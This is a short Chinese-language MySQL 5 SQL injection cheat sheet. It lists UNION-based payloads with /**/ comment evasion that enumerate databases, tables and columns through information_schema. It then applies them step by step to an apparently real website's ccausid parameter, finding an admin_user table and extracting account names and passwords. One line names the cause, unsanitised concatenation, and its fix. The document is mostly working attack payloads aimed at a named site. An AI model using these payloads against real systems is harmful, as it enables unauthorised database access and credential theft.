查库
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
查表
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
查字段
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
mysql5高级注入方法暴表
例子如下:
1.爆表
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 是数据库名 yd_teamnet 的十六进制表示)
这样爆到第4个时出现了admin_user表。(该注入之所以成立,是因为 ccausid 的值被直接拼接进了 SQL 语句;对该参数做整数校验或改用参数化查询即可阻断。)
2.暴字段
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
3.爆密码
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*